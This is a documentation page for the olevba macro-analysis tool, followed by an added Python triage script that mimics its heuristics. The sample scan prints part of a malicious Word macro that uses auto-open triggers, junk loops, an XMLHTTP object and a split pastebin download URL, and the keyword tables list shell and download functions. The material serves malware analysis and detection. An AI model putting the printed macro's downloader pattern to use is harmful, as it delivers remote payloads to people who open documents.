Python-oletools/olevba
Description
olevba is a script that parses OLE and OpenXML files such as MS Office documents (e.g. Word, Excel) to extract VBA macro code in clear text, and to deobfuscate and analyze malicious macros.
Supported formats:
- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
- PowerPoint 2007+ (.pptm, .ppsm)
- Word 2003 XML (.xml)
- Word/Excel Single File Web Page / MHTML (.mht)
For detailed use cases, refer to the official documentation.
Installation
Refer to this section.
Usage
Syntax
Usage: olevba.py [options] <filename> [filename2 ...]
Options
- -h, --help: show this help message and exit
- -r: find files recursively in subdirectories.
- -z ZIP_PASSWORD, --zip=ZIP_PASSWORD: if the file is a zip archive, open the first file from it, using the provided password (requires Python 2.6+)
- -f ZIP_FNAME, --zipfname=ZIP_FNAME: if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default: *)
- -t: triage mode, display results as a summary table (default for multiple files)
- -d: detailed mode, display full results (default for single file)
- -i INPUT, --input=INPUT: input file containing VBA source code to be analyzed (no parsing)
- --decode: display all the obfuscated strings with their decoded content (Hex, Base64, StrReverse, Dridex).
Usage example
Scan a file
$ ./olevba.py /data/tmp/31A0B9_05AC73F822.doc
olevba 0.30 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
MHT:MAS--B- /data/tmp/31A0B9_05AC73F822.doc

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: /data/tmp/31A0B9_05AC73F822.doc
Type: MHTML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: None - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub ertrettggdfg()
sdfertunn
End Sub

Sub AutoOpen()
ertrettggdfg
End Sub

Sub Workbook_Open()
ertrettggdfg
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+---------------+----------------------------------------+
| Type     | Keyword       | Description                            |
+----------+---------------+----------------------------------------+
| AutoExec | AutoOpen      | Runs when the Word document is opened  |
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+----------+---------------+----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: None - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub sdfertunn()
Dim vwUQwVaT As Integer
Dim pyBmgOaf As Integer
pyBmgOaf = 9
Do While pyBmgOaf < 31
DoEvents: pyBmgOaf = pyBmgOaf + 1
Loop
vwUQwVaT = 3
Do While vwUQwVaT < 64
Dim AeqvPkqo As Integer
AeqvPkqo = 3
Do While AeqvPkqo < 95
DoEvents: AeqvPkqo = AeqvPkqo + 1
Loop
DoEvents: vwUQwVaT = vwUQwVaT + 1
Dim GwEeerUz As Integer
GwEeerUz = 8
Do While GwEeerUz < 81
DoEvents: GwEeerUz = GwEeerUz + 1
Loop
Loop
Dim ilGubSJC As Integer
ilGubSJC = 9
Do While ilGubSJC < 96
DoEvents: ilGubSJC = ilGubSJC + 1
Loop
Set pOIhusdfh = CreateObject("MSXML2.XMLHTTP")
Dim NpoTkxWp As Integer
Dim DOlGfuxQ As Integer
DOlGfuxQ = 8
Do While DOlGfuxQ < 21
DoEvents: DOlGfuxQ = DOlGfuxQ + 1
Loop
NpoTkxWp = 1
Do While NpoTkxWp < 74
Dim PrUFuokB As Integer
PrUFuokB = 7
Do While PrUFuokB < 15
DoEvents: PrUFuokB = PrUFuokB + 1
Loop
DoEvents: NpoTkxWp = NpoTkxWp + 1
Dim sKoUeYqE As Integer
sKoUeYqE = 9
Do While sKoUeYqE < 91
DoEvents: sKoUeYqE = sKoUeYqE + 1
Loop
Loop
Dim hmswXZVD As Integer
hmswXZVD = 4
Do While hmswXZVD < 16
DoEvents: hmswXZVD = hmswXZVD + 1
Loop
dfghoH = "htt"
Dim HlLGKYsn As Integer
Dim zVoRhGok As Integer
zVoRhGok = 8
Do While zVoRhGok < 29
DoEvents: zVoRhGok = zVoRhGok + 1
Loop
HlLGKYsn = 6
Do While HlLGKYsn < 94
Dim KteeEBvG As Integer
KteeEBvG = 6
Do While KteeEBvG < 35
DoEvents: KteeEBvG = KteeEBvG + 1
Loop
DoEvents: HlLGKYsn = HlLGKYsn + 1
Dim dPGuAEbv As Integer
dPGuAEbv = 3
Do While dPGuAEbv < 33
DoEvents: dPGuAEbv = dPGuAEbv + 1
Loop
Loop
Dim jdKWlbdU As Integer
jdKWlbdU = 1
Do While jdKWlbdU < 14
DoEvents: jdKWlbdU = jdKWlbdU + 1
Loop
hGYdsfd = dfghoH + "p://pastebin.com/download.php?i=1YzPHtum"
Dim rQslplUl As Integer
Dim ANvxTfEF As Integer
ANvxTfEF = 6
Do While ANvxTfEF < 94
DoEvents: ANvxTfEF = ANvxTfEF + 1
Loop
[REMOVED]
Decode
$ ./olevba.py /data/tmp/31A0B9_05AC73F822.doc --decode
[REMOVED]
ANALYSIS:
+------------+-------------------+-----------------------------------------+
| Type       | Keyword           | Description                             |
+------------+-------------------+-----------------------------------------+
| Suspicious | Open              | May open a file                         |
| Suspicious | Shell             | May run an executable file or a system  |
|            |                   | command                                 |
| Suspicious | Shell.Application | May run an application (if combined     |
|            |                   | with CreateObject)                      |
| Suspicious | CreateObject      | May create an OLE object                |
| Suspicious | StrReverse        | May attempt to obfuscate specific       |
|            |                   | strings                                 |
| Suspicious | CreateTextFile    | May create a text file                  |
| Suspicious | Environ           | May read system environment variables   |
| Suspicious | Write             | May write to a file (if combined with   |
|            |                   | Open)                                   |
| Suspicious | Msxml2.XMLHTTP    | May download files from the Internet    |
| Suspicious | Base64 Strings    | Base64-encoded strings were detected,   |
|            |                   | may be used to obfuscate strings        |
|            |                   | (option --decode to see all)            |
| Base64     | '<\xe4\x93'       | POST                                    |
| String     |                   |                                         |
| Base64     | '<\xc1\x13'       | PMET                                    |
| String     |                   |                                         |
+------------+-------------------+-----------------------------------------+
-------------------------------------------------------------------------------
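The analysis table from "Scan a file" and the string decoding from "Decode" both come from the same kind of heuristics. The following is an added, self-contained example of those heuristics, not oletools' own code: the keyword tables and regexes are simplified re-implementations of what olevba does, the function names (analyze, find_keywords, decode_strings, join_literals, extract_urls) are hypothetical, and SAMPLE_VBA is a constructed macro built from the same tricks visible in the page's output (an AutoOpen entry point, a URL split across two literals, a StrReverse'd "TEMP", an MSXML2.XMLHTTP object) rather than the page's own sample.

```python
"""Minimal VBA macro triage in the style of olevba's analysis and --decode output.

Added example, not oletools' code: keyword tables and regexes are simplified
versions of olevba's heuristics; function names are hypothetical.
"""
import base64
import binascii
import re

# Constructed sample macro (not taken from the page).
SAMPLE_VBA = '''
Sub AutoOpen()
    Dim u As String
    u = "htt" + "p://example.invalid/update.txt"
    t = StrReverse("PMET")
    p = Environ(t)
    b = "U29tZSBCYXNlNjQgdGV4dA=="
    h = "48656C6C6F"
    Set o = CreateObject("MSXML2.XMLHTTP")
End Sub
'''

# Entry points Office runs without user interaction (subset of olevba's list).
AUTOEXEC = {
    "AutoOpen": "Runs when the Word document is opened",
    "Document_Open": "Runs when the Word document is opened",
    "Workbook_Open": "Runs when the Excel Workbook is opened",
    "Auto_Open": "Runs when the Excel Workbook is opened",
}
# Keywords worth a second look (subset of olevba's list, same descriptions).
SUSPICIOUS = {
    "Shell": "May run an executable file or a system command",
    "CreateObject": "May create an OLE object",
    "StrReverse": "May attempt to obfuscate specific strings",
    "Environ": "May read system environment variables",
    "MSXML2.XMLHTTP": "May download files from the Internet",
    "CreateTextFile": "May create a text file",
    "Open": "May open a file",
}

LITERAL = re.compile(r'"([^"\r\n]*)"')
STRREVERSE = re.compile(r'StrReverse\(\s*"([^"\r\n]*)"\s*\)', re.IGNORECASE)
HEX = re.compile(r'^(?:[0-9A-Fa-f]{2}){4,}$')
# Minimum of 4 characters, like olevba: short words such as "POST" or "PMET"
# also match, which is the false positive visible in the --decode output above.
B64 = re.compile(r'^[A-Za-z0-9+/]{4,}={0,2}$')
CONCAT = re.compile(r'"([^"\r\n]*)"\s*[+&]\s*"([^"\r\n]*)"')
URL = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)


def find_keywords(vba_code, table, kind):
    """Return (kind, keyword, description) for each table entry present as a whole word."""
    return [(kind, kw, desc) for kw, desc in table.items()
            if re.search(r"\b" + re.escape(kw) + r"\b", vba_code, re.IGNORECASE)]


def _text(raw):
    """Decode bytes for display and say whether they are plain printable ASCII."""
    return raw.decode("latin-1"), all(32 <= b < 127 for b in raw)


def decode_strings(vba_code):
    """Return (encoding, original, decoded, printable) for each obfuscated literal."""
    found = []
    for m in STRREVERSE.finditer(vba_code):
        found.append(("StrReverse", m.group(1), m.group(1)[::-1], True))
    for m in LITERAL.finditer(vba_code):
        s = m.group(1)
        if HEX.match(s):
            found.append(("Hex", s) + _text(bytes.fromhex(s)))
        elif B64.match(s) and len(s) % 4 == 0:
            try:
                raw = base64.b64decode(s, validate=True)
            except binascii.Error:
                continue
            found.append(("Base64", s) + _text(raw))
    return found


def join_literals(vba_code):
    """Merge "a" + "b" and "a" & "b" chains so split strings (e.g. URLs) read whole."""
    prev = None
    while prev != vba_code:
        prev = vba_code
        vba_code = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', vba_code)
    return vba_code


def extract_urls(vba_code):
    """IOC extraction: URLs found after re-joining split literals."""
    return sorted(set(URL.findall(join_literals(vba_code))))


def analyze(vba_code):
    """Run all checks and return them as one report dictionary."""
    return {
        "autoexec": find_keywords(vba_code, AUTOEXEC, "AutoExec"),
        "suspicious": find_keywords(vba_code, SUSPICIOUS, "Suspicious"),
        "decoded": decode_strings(vba_code),
        "urls": extract_urls(vba_code),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_VBA)
    for kind, kw, desc in report["autoexec"] + report["suspicious"]:
        print(f"{kind:10} | {kw:15} | {desc}")
    for enc, orig, dec, printable in report["decoded"]:
        print(f"{enc:10} | {orig!r:28} | {repr(dec) if printable else '(non-printable bytes)'}")
    for url in report["urls"]:
        print(f"IOC URL    | {url}")
```

Two things this shows that the tables alone do not: the same 4-character minimum olevba uses makes "PMET" show up twice, once as a genuine StrReverse hit decoding to "TEMP" and once as a Base64 hit decoding to the non-printable bytes '<\xc1\x13' exactly as in the page's output, so a triage script should report Base64 hits that decode to non-printable data as low confidence; and the URL only becomes visible as an IOC after the "htt" + "p://..." literals are re-joined, which is why a split URL in a macro is itself a signal worth flagging.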